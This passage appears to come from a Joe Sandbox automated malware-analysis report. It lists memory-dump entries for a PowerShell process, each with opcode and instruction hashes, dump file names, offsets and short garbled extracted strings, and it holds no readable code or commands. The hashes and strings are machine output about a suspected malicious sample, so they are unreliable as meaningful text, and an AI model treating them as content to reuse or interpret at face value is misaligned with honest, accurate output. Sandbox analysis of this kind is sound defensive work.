                    • Opcode ID: bf4c082cd9aac6840b17a106362877a396d8af9ca5b921f9e749b3b7066684dd
                    • Instruction ID: 33e8e50eb4799603bfb48ed652cb9b2eaff260466f9bcb9fa7ba8ab8a5559f94
                    • Opcode Fuzzy Hash: bf4c082cd9aac6840b17a106362877a396d8af9ca5b921f9e749b3b7066684dd
                    • Instruction Fuzzy Hash: 15410574A005059FCB09CF98C5D8AAAFBB1FF48310B25855AD945AB3A4C732FD91CFA4
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 69050f693aafc3594bc776f96c3418b2cbe662e7738a8ae7e54629aeb0b7efe6
                    • Instruction ID: 43ccb834b19f40c9a3989c36fb0edcc72b72548487b51e3df6d34101392aa057
                    • Opcode Fuzzy Hash: 69050f693aafc3594bc776f96c3418b2cbe662e7738a8ae7e54629aeb0b7efe6
                    • Instruction Fuzzy Hash: 39319374740114ABDB14A7A4C955BAF7BA3DF84704F10C424E9017F3A6CF7A9C468BE1
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cea627f88d48f116e68c2b316afb193e44a553d93bed8b147ceb70950a8fac2b
                    • Instruction ID: 89fb5de99442ea61832b0b614cf5666ee47cf530f1fae6e05a9c13975ed06aac
                    • Opcode Fuzzy Hash: cea627f88d48f116e68c2b316afb193e44a553d93bed8b147ceb70950a8fac2b
                    • Instruction Fuzzy Hash: 7331E4B56002069FDF308F25C5807FBBBA5AF85700F54846AF844976A2D735EAC5CBA1
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c8498de6d5a722d9a530e8f1a049c0c696d718cf8352f84ff1e63340075d7e3
                    • Instruction ID: a78e2fe84f7e9aada4a6496fa5da7493bcf55918715438e2a0f823129e3dc3ef
                    • Opcode Fuzzy Hash: 8c8498de6d5a722d9a530e8f1a049c0c696d718cf8352f84ff1e63340075d7e3
                    • Instruction Fuzzy Hash: 1821D5F560021ADFDF348E29C5807FB77A5AF84740F548069F805972A1D735EAC5CBA1
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 112317dcdd5b06aa1b7742a883f4472a691a17594bb03c5f09b69cd611c10e31
                    • Instruction ID: 4d44aba01e0655cbc0dcbd0baf24e2df0d9de5dd6ebe41d9ebeedd4f60f33c5e
                    • Opcode Fuzzy Hash: 112317dcdd5b06aa1b7742a883f4472a691a17594bb03c5f09b69cd611c10e31
                    • Instruction Fuzzy Hash: 6E314130B01228CBCB269B74C8597EEB6B2AF49708F1544E9D405AB392DF35DE81CF81
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 195fb18cd4e1e76364d4349a8b3dd9d4a3b4f4361af7dd18e4399e4fd343cfd8
                    • Instruction ID: a135b23f0acee6b38e04a6e22faa1c327e7abbaffdaa6a9946546764375e2fe1
                    • Opcode Fuzzy Hash: 195fb18cd4e1e76364d4349a8b3dd9d4a3b4f4361af7dd18e4399e4fd343cfd8
                    • Instruction Fuzzy Hash: 08210774A00209DFCB05CF9DC9809AAFBB1FF49310B158599E849EB761C735EC41CBA0
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb247534b926afd571ac1a462884298c7d898453af8627f5cd165049206b0161
                    • Instruction ID: 9eca3e5a9f16db54a4aaf365772e20085262b5fedaf609a669a80d8c4dc57eba
                    • Opcode Fuzzy Hash: bb247534b926afd571ac1a462884298c7d898453af8627f5cd165049206b0161
                    • Instruction Fuzzy Hash: CD21D474A006099FCB44CF99C984AAAFBF5FF48310B148599E909E7761C731ED91CBA4
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a1c8a39de02047d732de3d2a39e04c2eef88944a3d896116c1635fde9ecadf6
                    • Instruction ID: 2b12e9237a0a4d1d1ae60103df9559ce5a0b4c165839481de602ec000f27d051
                    • Opcode Fuzzy Hash: 1a1c8a39de02047d732de3d2a39e04c2eef88944a3d896116c1635fde9ecadf6
                    • Instruction Fuzzy Hash: 5D214A74A052099FCB00CF58C484AAAFBF5FF89310B158499E848EB366C731FC40CBA1
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: af204082e1f5df2504266de4a073f04cf6c5c141c17158ed49496621403dd1aa
                    • Instruction ID: 5ebacf8da19c5cf654fa64b63e07707d38ebd9e9fd629f45f457200f95902b80
                    • Opcode Fuzzy Hash: af204082e1f5df2504266de4a073f04cf6c5c141c17158ed49496621403dd1aa
                    • Instruction Fuzzy Hash: 28115D38D05248EBEF35DBA4D5987ACB7B1BB4531DF24942EC001F71D0ABB4688ACB56
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317054460.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4c9d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6e1c51bc88313c9bd7329ca4a375a21b9ce606764518426deeb4fb8cd44e5c0
                    • Instruction ID: 6356175fd6d08ba891e69a981e0334e72f5278d73e1d4ed348f4fa0c4792b951
                    • Opcode Fuzzy Hash: a6e1c51bc88313c9bd7329ca4a375a21b9ce606764518426deeb4fb8cd44e5c0
                    • Instruction Fuzzy Hash: 0B017B31104300BADB208E16DD88B63FFDCEF46320F0CC569ED4A1B242D239AD41C6B1
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317054460.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4c9d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d763e9088bed1f7ada60d518b7985f638e588d36dcaeeab7f61c20fcc8cd1e35
                    • Instruction ID: acd8bb525ec9f51a5e2c4e39e15cc7ae2bd3ea4bf3fd83e0ed1576bc65a44e0a
                    • Opcode Fuzzy Hash: d763e9088bed1f7ada60d518b7985f638e588d36dcaeeab7f61c20fcc8cd1e35
                    • Instruction Fuzzy Hash: 7EF0C271005344BEEB108E16DD88B62FFD8EF46734F18C55AED481F286C279A841CAB0
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 930ea38a98d660c3da8d6a19c11ab8fafc7377e1eace37681348a72c1675d153
                    • Instruction ID: acc527af8c47e5378bbc18df4481345cb0e3a8b55941e199ad9259bd7fb9d930
                    • Opcode Fuzzy Hash: 930ea38a98d660c3da8d6a19c11ab8fafc7377e1eace37681348a72c1675d153
                    • Instruction Fuzzy Hash: 85E092357092848FCB02CB5CD8645DCBBB0EF4A324B1982D7D89497293C322AC16CB10
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317054460.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4c9d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 906ecb959d5724b9272f9f6a3d891a410dc32ba89730007fa0dfce91ab6cb6ba
                    • Instruction ID: 5ef80eeebdc3bb54f6f6643d1e10346303dd17cc1f4f5e143eab86775e1c28b1
                    • Opcode Fuzzy Hash: 906ecb959d5724b9272f9f6a3d891a410dc32ba89730007fa0dfce91ab6cb6ba
                    • Instruction Fuzzy Hash: B0210672604300EFCF05DF14D9C4B16BFA6FB84310F248569D90A1B25AC33AE855DAA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$TQbq$TQbq$TQbq$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-26033926
                    • Opcode ID: a05948931c6f92ed49f226cdd9eaa2f0b138b3f4c55b4955cdf203c03c9c1636
                    • Instruction ID: a69e08291fd0e1a1cd346b8d03d6dbbf5cd75cbb803bdf726731d3dcf5c5407c
                    • Opcode Fuzzy Hash: a05948931c6f92ed49f226cdd9eaa2f0b138b3f4c55b4955cdf203c03c9c1636
                    • Instruction Fuzzy Hash: D4D137B170020ACFCB358F69D5946EA7BA2EF85311F1484AAF852DB291CB31DE45C7B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-2004741541
                    • Opcode ID: b6b6059d00aa6fd649c8ba10ee943482a292c4b0e6963abd4d527fd4e8247c6b
                    • Instruction ID: 7c64a31f1cfc4b1cbd85e9f451c2bb79388480771e75a25ffdb1e432212bb972
                    • Opcode Fuzzy Hash: b6b6059d00aa6fd649c8ba10ee943482a292c4b0e6963abd4d527fd4e8247c6b
                    • Instruction Fuzzy Hash: 45C103F5B0020ADFCB388F69D4906EAB7A1EF81321F14C46AF8558B254DB35DE41CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                    • API String ID: 0-3029092631
                    • Opcode ID: 38f2c1a1c78e711f440716dc4b1264641c853270c0b1c5caf7c9b78b6b212e81
                    • Instruction ID: aafcb7da9dd41db02eac0e3be981ebf43e2da6ac89a58ec4c88f671b38b26f12
                    • Opcode Fuzzy Hash: 38f2c1a1c78e711f440716dc4b1264641c853270c0b1c5caf7c9b78b6b212e81
                    • Instruction Fuzzy Hash: 9DB10AB47002159FCB348F69C984AEABBF6EF89310F148465F8069B395CB31DD45CBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                    • API String ID: 0-3118609902
                    • Opcode ID: 2eabf89c77d5fa518dc0427a9881f800cd20691e94578b7634011cf83eba36e5
                    • Instruction ID: 2bd64e60eec8a596ae3fbeca706095976bfc13d52fa213c3509b118c3e5afd8e
                    • Opcode Fuzzy Hash: 2eabf89c77d5fa518dc0427a9881f800cd20691e94578b7634011cf83eba36e5
                    • Instruction Fuzzy Hash: 737116B1B002159FDB388F69C590AEEBBA6EF84710F14886AF8059B350DB31DE41C7B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-1910532044
                    • Opcode ID: 9aa49b748d37fc7476a27a91eac4dd6b6ac5e8a52b71151e8227b23058b86dea
                    • Instruction ID: 4d2f4ee00ecd56c87f035870e86d14c82dc5d42842c084b2847c973aebe644c4
                    • Opcode Fuzzy Hash: 9aa49b748d37fc7476a27a91eac4dd6b6ac5e8a52b71151e8227b23058b86dea
                    • Instruction Fuzzy Hash: 31A1F8B0B1020ADFCB398F69C5847EA7BA6EF85311F548465F8469B294CB31DE41CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-1910532044
                    • Opcode ID: e6c6ff9c11c859939cd17aef020a52a1be2748ad8669c7cabaa7fbe70fb08b5a
                    • Instruction ID: b7ab07bc140638d8ce733229020df8c7c62e627e417ae55731fca1d61320e70d
                    • Opcode Fuzzy Hash: e6c6ff9c11c859939cd17aef020a52a1be2748ad8669c7cabaa7fbe70fb08b5a
                    • Instruction Fuzzy Hash: 1F5109B1B0010D9FCB398FA9C4A4AEAB7E6AF85710F18C469F9559B250CB31DA41CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-3118171705
                    • Opcode ID: b6061349e98bbf182a0fedef761a4eac6857a07cd582cfd508120104821767ac
                    • Instruction ID: abcacfdcf38a7741f8d11ba077ac22925995886bad9aa177c966a40ac9fcccb2
                    • Opcode Fuzzy Hash: b6061349e98bbf182a0fedef761a4eac6857a07cd582cfd508120104821767ac
                    • Instruction Fuzzy Hash: 40514BB2B143169FDB354E29C8D46A67BD5FF82610F18446AF849CB251CA36CE41C7A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                    • API String ID: 0-537408273
                    • Opcode ID: 823c64b84c23035315fc94d07b8d0c4932423d9fc0cae48e3da0cfd65125ab13
                    • Instruction ID: 95c7e2d283852b9d032e1dc056d3bd0582c1da6cac32031344ceeaaf5ae6e96b
                    • Opcode Fuzzy Hash: 823c64b84c23035315fc94d07b8d0c4932423d9fc0cae48e3da0cfd65125ab13
                    • Instruction Fuzzy Hash: B281A5B5700216DFCB34CF55C580AEAB7B2AF89711F198495F806AB291CB31DE85CB61
                    Strings
                    Memory Dump Source